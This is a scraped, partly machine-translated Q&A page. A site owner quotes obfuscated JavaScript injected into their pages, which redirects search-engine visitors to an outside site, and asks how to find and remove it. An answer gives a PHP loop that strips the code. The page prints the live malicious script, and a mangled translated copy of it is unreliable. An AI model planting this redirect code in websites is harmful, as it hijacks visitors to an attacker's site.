Warning: file_get_contents(/data/phpspider/zhask/data//catemap/4/regex/19.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Php 检查文件是否包含特定Javascript代码的最佳方法是什么?_Php_Regex_Search - Fatal编程技术网

Php 检查文件是否包含特定Javascript代码的最佳方法是什么?

Php 检查文件是否包含特定Javascript代码的最佳方法是什么?,php,regex,search,Php,Regex,Search,我的网站已被标记为报告的攻击页面 以下是可疑代码: <script language="JavaScript">eval(function(p,a,c,k,e,r){e=f unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str ing)){while(c--)r[e(c)]=k[c]|

我的网站已被标记为报告的攻击页面

以下是可疑代码:

<script language="JavaScript">eval(function(p,a,c,k,e,r){e=f
unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin
g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str
ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e
]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re
place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=
x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
.o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr
er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
ubstring|split||||||ea|ht|tp|document|||go|window|location'.
split('|'),0,{}))</script>
eval(函数(p,a,c,k,e,r){e=f
函数(c){返回(c35?Strin
g、 fromCharCode(c+29):c.toString(36))};if(!“”。替换(/^/,Str
ing){while(c--)r[e(c)]=k[c]| | e(c);k=[函数(e){返回r[e]
]}];e=function(){return'\\w+'};c=1};而(c--)if(k[c])p=p.re
place(新RegExp('\\b'+e(c)+'\\b','g'),k[c]);返回p}('er=
x、 9,t=“”,q;4(r.3(“m”)!=-1)t=“q”;4(r.3(“7”)!=-1)t=“q”;4(r.3
(“8”)!=-1)t=“p”;4(r.3(“a”)!=-1)t=“q”;4(r.3(“f”)!=-1)t=“g”
;4(r.3(“j”)!=-1)t=“q”;4(t.6&((q=r.3(“?”+t+”=”))!=-1 | |(q=r。
3(&“+t+”=”)!=-1)B.C=“v”+“w”+:/“+”/A”+“B”+“k”+“5”+“h”+“C
“+”z/s“+”u“+”5“+”h.p“+”d?”+“t”+”y=1&t“+”i“+”l=“+r.n(q+2+t.6)
.o(“&“[0];”,39,39,“| | | | | indexOf | if | rc | length | msn | yahoo | referer”
er | altavista | ogo | bi | hp | var | aol | query | er | ask | sea | ms | google |
ubstring | split | ea | ht | tp | document | | go | window | location |。
拆分(“|”)、0、{})
我想写一些PHP代码来遍历站点路径中的文件夹,并获取每个文件夹中的文件。对于每个文件,我将打开它并使用正则表达式检查它是否包含上述代码


这是个好主意,还是我应该在这里做些什么?

您只需要做一些字符串替换,因为您确切地知道您在寻找什么。类似的方法应该可以工作(您可能需要根据调用此脚本的位置调整对
glob
的调用

<?php

$js = 'INSERT THE CODE FROM YOUR POST HERE';
foreach( glob("*") as $filename) {
    $contents = file_get_contents( $filename);
    $contents = str_replace( $js, '', $contents); // Replace the code with nothing
    file_put_contents( $filename, $contents);
}

@DOK小心点,伙计,问题出在哪里?那么,你的意思是,你的页面中有代码,但你不知道它从哪里来?或者你只是不想在输出之前逃避用户提交的内容?@dqhendricks我想现在就从我的网站上删除这些代码,方法是检查我的网页根目录中的所有文件好的,但如果你不明白怎么做的话它到了那里,很有可能在你试图摆脱它之后它会马上回来。我现在将禁用我的网站,从外壳和后门检查它,然后做我的测试